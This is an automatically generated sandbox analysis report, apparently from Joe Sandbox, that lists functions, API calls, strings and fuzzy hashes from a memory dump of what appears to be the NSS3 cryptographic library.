Instruction Fuzzy Hash: 5E01BBB0B05B2756E7616B7A4E183E7B6E96F01398F100C3A8C69C6E50EF71D4488FA1

Function 6C75AE30 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 231COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CDD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C75AFDA

Strings

misuse, xrefs: 6C75AFCE
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C75AFC4
%s at line %d of [%.10s], xrefs: 6C75AFD3
unable to delete/modify collation sequence due to active statements, xrefs: 6C75AF5C

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse$unable to delete/modify collation sequence due to active statements
API String ID: 632333372-924978290
Opcode ID: e4c425fbf38fac8fae3911cf420a5bc8b9a3d5897ae6c79344fe79a391e8102d
Instruction ID: 1b702d19bb83ea1c6f156951525cd24a45d974971fe446a92ae4049b8277810f
Opcode Fuzzy Hash: e4c425fbf38fac8fae3911cf420a5bc8b9a3d5897ae6c79344fe79a391e8102d
Instruction Fuzzy Hash: 4391E171B012158FDB04CF59CA50ABABBF1BF45324F5984B8E864AB791CB31EC11CBA0

Function 6C7849C0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97COMMON

Download Yara Rule

APIs

Part of subcall function 6C784860: SEC_QuickDERDecodeItem_Util.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C784894

PR_SetError.NSS3(FFFFE006,00000000,?,?,?,?,?,6C786361,?,?,?), ref: 6C784A8F
PR_SetError.NSS3(FFFFE006,00000000,?,?,?,?,?,6C786361,?,?,?), ref: 6C784AD0

Strings

acxl, xrefs: 6C7849FB
acxl, xrefs: 6C784AB4
^jxl, xrefs: 6C7849C5

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Error$DecodeItem_QuickUtil
String ID: ^jxl$acxl$acxl
API String ID: 1982233058-3705461369
Opcode ID: 15bb055f9b957e9833dd4544f1bf77bcd3909361eb388226ae8c087a6c8f4d80
Instruction ID: 7720b924cb7fbde0b33521a0439b66b2d2b4187aa3c51de72c654e7f665630a6
Opcode Fuzzy Hash: 15bb055f9b957e9833dd4544f1bf77bcd3909361eb388226ae8c087a6c8f4d80
Instruction Fuzzy Hash: 94310A31A0610687EB108A49DEB076E736DF781318F100A3AD715BFBC1C67C984097DB

Function 6C784B00 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 84memoryCOMMON

Download Yara Rule

APIs

NSS_GetAlgorithmPolicy.NSS3(?,?), ref: 6C784B66
NSS_GetAlgorithmPolicy.NSS3(?,?), ref: 6C784B7D
PR_SetError.NSS3(FFFFE0B5,00000000), ref: 6C784B97
PORT_ZAlloc_Util.NSS3(00000018), ref: 6C784BB7

Part of subcall function 6C7D0D30: calloc.MOZGLUE ref: 6C7D0D50
Part of subcall function 6C7D0D30: TlsGetValue.KERNEL32 ref: 6C7D0D6D

Strings

, xrefs: 6C784B8A

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: AlgorithmPolicy$Alloc_ErrorUtilValuecalloc
String ID:
API String ID: 4087055539-3916222277
Opcode ID: ee510920f0535d667b399ab4e8091237669e2e7bfb66ff9440649eeb7c1e7e29
Instruction ID: 35555bbf2f113250fa90150c20cb4d45c4bbf0fbf10ce36df1191369288d297e
Opcode Fuzzy Hash: ee510920f0535d667b399ab4e8091237669e2e7bfb66ff9440649eeb7c1e7e29
Instruction Fuzzy Hash: 57213B71D0224A5BDF10CA599E55BBFBFB8AF4071CF200235F72996A81F7A09508D7E2

Function 6C84A800 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 65COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000001,?,?,?,?,?,?,?,?,6C717915,?,?), ref: 6C84A86D
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010800,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,?,?,?,?,?,?,?,6C717915,?,?), ref: 6C84A8A6

Strings

database corruption, xrefs: 6C84A89B
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C84A891
%s at line %d of [%.10s], xrefs: 6C84A8A0

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: _byteswap_ulongsqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 912837312-598938438
Opcode ID: bf5120ba73324ebb630e1e5f0b39c30f8ced5dd5a5ace55bc6466832ccb4a26e
Instruction ID: 0d6dd3813ad91fd9854c610fa34cd80335475e652a5dd9bfa72fda98dbe38dc3
Opcode Fuzzy Hash: bf5120ba73324ebb630e1e5f0b39c30f8ced5dd5a5ace55bc6466832ccb4a26e
Instruction Fuzzy Hash: 6B112975A00228ABD7248F51DE41AAAB7A5FF49714F048838FC194FB80EB34E916C7D1

Function 6C7ACAA0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

PR_GetEnvSecure.NSS3(NSS_DISABLE_UNLOAD,6C78B1EE,D958E836,?,6C7C51C5), ref: 6C7ACAFA
PR_UnloadLibrary.NSS3(?,6C7C51C5), ref: 6C7ACB09
PR_GetEnvSecure.NSS3(NSS_DISABLE_UNLOAD,6C78B1EE,D958E836,?,6C7C51C5), ref: 6C7ACB2C
PR_UnloadLibrary.NSS3(6C7C51C5), ref: 6C7ACB3E

Strings

NSS_DISABLE_UNLOAD, xrefs: 6C7ACAF5, 6C7ACB27

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: LibrarySecureUnload
String ID: NSS_DISABLE_UNLOAD
API String ID: 4190191112-1204168554
Opcode ID: de5fc11a045c36d984b5b8f7ea36f86ed9e7154f14ee2a73c95a8084bbb5311f
Instruction ID: 87a5652cf1fd9c88cafc50585f81f7dd2ff0ffdff968c22bd4227df19fd69e33
Opcode Fuzzy Hash: de5fc11a045c36d984b5b8f7ea36f86ed9e7154f14ee2a73c95a8084bbb5311f
Instruction Fuzzy Hash: B7110AB1B00611ABD729EBA5D60C751B2B0BB0174EF04423AD80483E50E777F856CBD2

Function 6C760DC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51stringCOMMON

Download Yara Rule

APIs

strrchr.VCRUNTIME140(00000000,0000005C,00000000,00000000,00000000,?,6C760BDE), ref: 6C760DCB
strrchr.VCRUNTIME140(00000000,0000005C,?,6C760BDE), ref: 6C760DEA
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(00000001,00000001,?,?,?,6C760BDE), ref: 6C760DFC
PR_LogPrint.NSS3(%s incr => %d (find lib),?,?,?,?,?,?,?,6C760BDE), ref: 6C760E32

Strings

%s incr => %d (find lib), xrefs: 6C760E2D

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: strrchr$Print_stricmp
String ID: %s incr => %d (find lib)
API String ID: 97259331-2309350800
Opcode ID: 305e507e4c6c491c3b35fb4ec9ab946a534ca960af33628913295ae2d31ebab8
Instruction ID: 241008958fb5cad3926823393d74f962153727fdf850e9276bfb0288546f6175
Opcode Fuzzy Hash: 305e507e4c6c491c3b35fb4ec9ab946a534ca960af33628913295ae2d31ebab8
Instruction Fuzzy Hash: 7E019E726016249FE6209F2ADD49A1773ACDF45B09B0548B9ED09D3E42E761FC1487E1

Function 6C6F2940 Relevance: 7.8, APIs: 6, Instructions: 327stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,6C6F1360,00000000), ref: 6C6F2A19
memcpy.VCRUNTIME140(?,00000009,00000034,?,?,?,6C6F1360,00000000), ref: 6C6F2A45
memcpy.VCRUNTIME140(?,00000000,00000000), ref: 6C6F2A7C

Part of subcall function 6C6F2D50: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,731E398C,?,?,00000000,?,6C6F296E), ref: 6C6F2DA4

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6F2AF3
memcpy.VCRUNTIME140(?,00000009,0000000C,?,?,?,6C6F1360,00000000), ref: 6C6F2B71
memset.VCRUNTIME140(00000000,00000000,00000034), ref: 6C6F2B90

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: memcpystrlen$memset
String ID:
API String ID: 638109778-0
Opcode ID: e389cf6198017cd481bcae05c1a34263b27636e4ac0df6b2b9dede9b04d4abb3
Instruction ID: c945d15293b3935c5dcb19583fa9ccc0f8dc83ee5c1fb4f10e0e1e2d2c078e5e
Opcode Fuzzy Hash: e389cf6198017cd481bcae05c1a34263b27636e4ac0df6b2b9dede9b04d4abb3
Instruction Fuzzy Hash: 6DC1B371F012468BEB04CF69C8947ABB7B6BF89318F158229D9299B741D730E842CFD5

Function 6C70A910 Relevance: 7.7, APIs: 5, Instructions: 241COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b6409f158af4667b8575dff2ae7fa7686cf40325d3a5338c530c83a780cbc20
Instruction ID: 16904c6aff6e76ceaa5b0e8a7365a69618b689fca5b4eb05576e03711c7ab081
Opcode Fuzzy Hash: 8b6409f158af4667b8575dff2ae7fa7686cf40325d3a5338c530c83a780cbc20
Instruction Fuzzy Hash: EF918FB17002058FEB28DF64EACAB6A37F5BF86329F04043DE54647A41DB38A945CBD1

Function 6C778B50 Relevance: 7.7, APIs: 5, Instructions: 218COMMON

Download Yara Rule

APIs

CERT_DecodeAVAValue.NSS3 ref: 6C778B5C
CERT_DecodeAVAValue.NSS3 ref: 6C778B67

Part of subcall function 6C778E00: PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C778EED
Part of subcall function 6C778E00: SEC_QuickDERDecodeItem_Util.NSS3(?,?,6C8A18D0,?), ref: 6C778F03
Part of subcall function 6C778E00: PR_CallOnce.NSS3(6C8D2AA4,6C7D12D0), ref: 6C778F19
Part of subcall function 6C778E00: PL_FreeArenaPool.NSS3(?), ref: 6C778F2B

SECITEM_CompareItem_Util.NSS3(?,?), ref: 6C778D5C
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C778D6B
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C778D76

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Item_Util$Decode$ArenaPoolValueZfree$CallCompareFreeInitOnceQuick
String ID:
API String ID: 185717074-0
Opcode ID: 0b2f8dd38a6241c10cbb34373fa26296834094dbcb1128f17eabedd40295e484
Instruction ID: 14616f5307ce75a0cb8119e2c011477b1ad208709727d09af4bcea656f3bda38
Opcode Fuzzy Hash: 0b2f8dd38a6241c10cbb34373fa26296834094dbcb1128f17eabedd40295e484
Instruction Fuzzy Hash: 0A710471F4162D8FDF348A59CA907AAB7F1EB49325F194276D824B7792D3349C01C7A0

Function 6C78C9E0 Relevance: 7.6, APIs: 5, Instructions: 132COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,?,?,00000000), ref: 6C78CA21
EnterCriticalSection.KERNEL32(0000001C), ref: 6C78CA35
PR_Unlock.NSS3(00000000), ref: 6C78CA66
PR_SetError.NSS3(FFFFE041,00000000,00000000,?,?,00000000), ref: 6C78CA77
PR_Unlock.NSS3(00000000), ref: 6C78CAFC

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Unlock$CriticalEnterErrorSectionValue
String ID:
API String ID: 1974170392-0
Opcode ID: 1f5198db4c6810a5488828f0a5f356bb3d9b8016318b9cf960c5ab8f26ed4c24
Instruction ID: 53f330ce0b83da31a353df746c9399ca153a3bc1e9faa9906e21250b44319f5a
Opcode Fuzzy Hash: 1f5198db4c6810a5488828f0a5f356bb3d9b8016318b9cf960c5ab8f26ed4c24
Instruction Fuzzy Hash: 4541F275A012059BEB00EF68DA45AAB7BB4FF45399F144238EE1897701EB34E910CBD2

Function 6C7E4A00 Relevance: 7.6, APIs: 5, Instructions: 126threadCOMMON

Download Yara Rule

APIs

PR_GetCurrentThread.NSS3 ref: 6C7E4A8D
CERT_SaveSMimeProfile.NSS3(00000000,00000000,00000000), ref: 6C7E4B01
CERT_DestroyCertificate.NSS3(00000000), ref: 6C7E4B12
PR_SetError.NSS3(?,00000000), ref: 6C7E4B1F
CERT_FindCertByIssuerAndSN.NSS3(?,?), ref: 6C7E4B35

Part of subcall function 6C7E04A0: SECOID_FindOIDByTag_Util.NSS3(?,?,?,?,?,00000000), ref: 6C7E04B9
Part of subcall function 6C7E04A0: memcmp.VCRUNTIME140(?,?,?,?,?,?,?,?,00000000), ref: 6C7E050A
Part of subcall function 6C7E04A0: memcmp.VCRUNTIME140(?,00000000,?), ref: 6C7E0545

Part of subcall function 6C7E52E0: PORT_NewArena_Util.NSS3(00000400,6C7E4A57,?,00000000), ref: 6C7E52F7
Part of subcall function 6C7E52E0: SEC_QuickDERDecodeItem_Util.NSS3(00000000,?,6C8A301C,WJ~l,?,6C7E4A57,?,00000000), ref: 6C7E5312
Part of subcall function 6C7E52E0: CERT_FindCertByIssuerAndSN.NSS3(?,?,?,?,?,?,?,6C7E4A57,?,00000000), ref: 6C7E5327
Part of subcall function 6C7E52E0: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,6C7E4A57,?,00000000), ref: 6C7E5334

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$Find$Arena_CertIssuermemcmp$CertificateCurrentDecodeDestroyErrorFreeItem_MimeProfileQuickSaveTag_Thread
String ID:
API String ID: 3052039812-0
Opcode ID: 367620b1bc45d35f1ebfefbeaa9018ca66edc8beecb84977463bee4b3c5aafc8
Instruction ID: 11b5e3b9a4ff2fe45cd1239aa915e588d6fbd065e5ed607a676490f9fcfd271a
Opcode Fuzzy Hash: 367620b1bc45d35f1ebfefbeaa9018ca66edc8beecb84977463bee4b3c5aafc8
Instruction Fuzzy Hash: DA3118B3E012506BEB109EB5AE48B6B36ACAF0932DF150074EC14ABF42F735D814D3A5

Function 6C7B6AE0 Relevance: 7.6, APIs: 6, Instructions: 125stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C7B6910: NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6C7B6943
Part of subcall function 6C7B6910: NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6C7B6957
Part of subcall function 6C7B6910: NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6C7B6972
Part of subcall function 6C7B6910: NSSUTIL_ArgStrip.NSS3(00000000), ref: 6C7B6983
Part of subcall function 6C7B6910: PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6C7B69AA
Part of subcall function 6C7B6910: PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6C7B69BE
Part of subcall function 6C7B6910: PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6C7B69D2
Part of subcall function 6C7B6910: NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6C7B69DF
Part of subcall function 6C7B6910: NSSUTIL_ArgStrip.NSS3(?), ref: 6C7B6A5B

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,00000000,6C7B781D,?,6C7ABE2C,?,00000000,00000000), ref: 6C7B6B66
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,6C7B781D,?,6C7ABE2C,?,00000000,00000000), ref: 6C7B6B88
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,6C7B781D,?,6C7ABE2C,?,00000000,00000000), ref: 6C7B6BAF
free.MOZGLUE(00000000,?,?,?,?,00000000,00000000,6C7B781D,?,6C7ABE2C,?,00000000,00000000), ref: 6C7B6BE6
free.MOZGLUE(?,?,?,?,?,00000000,00000000,6C7B781D,?,6C7ABE2C,?,00000000,00000000), ref: 6C7B6BF7
free.MOZGLUE(6C7B781D,?,?,?,?,00000000,00000000,6C7B781D,?,6C7ABE2C,?,00000000,00000000), ref: 6C7B6C08

Part of subcall function 6C7B6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C7B781D,00000000,6C7ABE2C,?,6C7B6B1D,?,?,?,?,00000000,00000000,6C7B781D), ref: 6C7B6C40
Part of subcall function 6C7B6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C7B781D,?,6C7ABE2C,?), ref: 6C7B6C58
Part of subcall function 6C7B6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C7B781D), ref: 6C7B6C6F
Part of subcall function 6C7B6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C7B6C84
Part of subcall function 6C7B6C30: PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C7B6C96
Part of subcall function 6C7B6C30: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C7B6CAA

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: strcmpstrncmp$FlagL_strncasecmpfree$Strip$ParameterSecureSkip
String ID:
API String ID: 3779992554-0
Opcode ID: ff5ad6e32ce2243970419647fddf974718eab1a15ad1abcdcac8751001a963c6
Instruction ID: 86cdf03651c135ea8326ccf8c791b8dca3c64db953caddfa254ec34634c9fa66
Opcode Fuzzy Hash: ff5ad6e32ce2243970419647fddf974718eab1a15ad1abcdcac8751001a963c6
Instruction Fuzzy Hash: 824183B5E012199BEF14CFA9CA44BAFB7B8AF05348F240435DA14F7640E735EA44CBA1

Function 6C7C4B00 Relevance: 7.6, APIs: 5, Instructions: 119stringCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE09A,00000000,-00000001,00000000,?,?,6C7B7B3B,00000000,?,?,00000000), ref: 6C7C4BA3

Part of subcall function 6C7C8970: TlsGetValue.KERNEL32(?,00000000,6C7761C4,?,6C775639,00000000), ref: 6C7C8991
Part of subcall function 6C7C8970: TlsGetValue.KERNEL32(?,?,?,?,?,6C775639,00000000), ref: 6C7C89AD
Part of subcall function 6C7C8970: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6C775639,00000000), ref: 6C7C89C6
Part of subcall function 6C7C8970: PR_WaitCondVar.NSS3 ref: 6C7C89F7
Part of subcall function 6C7C8970: PR_Unlock.NSS3(?,?,?,?,?,?,?,6C775639,00000000), ref: 6C7C8A0C

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000), ref: 6C7C4B44
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000), ref: 6C7C4B7E
SECMOD_DestroyModule.NSS3(00000000), ref: 6C7C4C44
free.MOZGLUE(?), ref: 6C7C4C54

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
